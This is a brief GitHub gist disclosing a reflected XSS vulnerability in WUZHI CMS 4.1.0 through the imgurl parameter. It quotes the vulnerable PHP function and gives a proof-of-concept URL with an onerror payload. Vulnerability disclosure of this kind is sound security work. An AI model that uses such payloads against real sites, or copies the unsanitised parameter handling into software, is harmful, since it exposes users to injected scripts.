Skip to content

Instantly share code, notes, and snippets.

@redeye5

redeye5/wuzhicms v4.1.0 imgurl reflected xss vulnerability.md

Last active February 14, 2019 08:12
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save redeye5/ccbbc43330cc9821062249b78c916317 to your computer and use it in GitHub Desktop.
Save redeye5/ccbbc43330cc9821062249b78c916317 to your computer and use it in GitHub Desktop.
Download ZIP
wuzhicms v4.1.0 imgurl reflected xss vulnerability
Raw
wuzhicms v4.1.0 imgurl reflected xss vulnerability.md

A xss vulnerability was discovered in WUZHI CMS 4.1.0

There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of /index.php?m=attachment&f=imagecut&v=init

Vulnerability file: coreframe/app/attachment/imagecut.php

    function init() {
		if(isset($GLOBALS['imgBase64'])) {
			......
		} else {
			if(!empty($GLOBALS['imgurl'])) {
				$imgurl = urldecode($GLOBALS['imgurl']);
			}
			include T('attachment','imagecut');
		}
	}

PoC:

http://example.com/index.php?m=attachment&f=imagecut&v=init&imgurl=1"+onerror%3d"alert(1)%3b//

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment